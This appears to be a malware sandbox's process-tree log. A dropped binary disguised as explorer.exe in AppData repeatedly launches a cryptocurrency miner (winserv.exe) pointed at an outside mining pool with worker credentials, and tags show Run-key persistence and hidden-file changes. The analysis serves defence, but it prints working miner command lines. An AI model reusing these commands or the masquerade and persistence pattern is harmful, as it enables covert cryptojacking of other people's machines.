C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1236
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:100
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:760
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1432 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:628
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3932
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1544 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2664
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4992 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4952 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:620 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:408 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5096
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4448 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4508
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2416 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:768 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4556
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3344 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4164
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1572
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1484
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3536 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:376
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4992 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2768
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5048
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4408
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1180 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:440
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4676
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3852 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1384
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1288 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2788
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2828 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4680
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:636 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4508
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4452 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3428
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4048 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4928
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2692 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2928
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5112 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1108
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1092
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2244 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:408
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2996 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4972
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5096
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2176
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1952 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4388
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3096
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3812 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1392
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4968 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2792
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2136 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2520
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4932 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:440 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1584
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
PID:3632 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3332
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1468
-
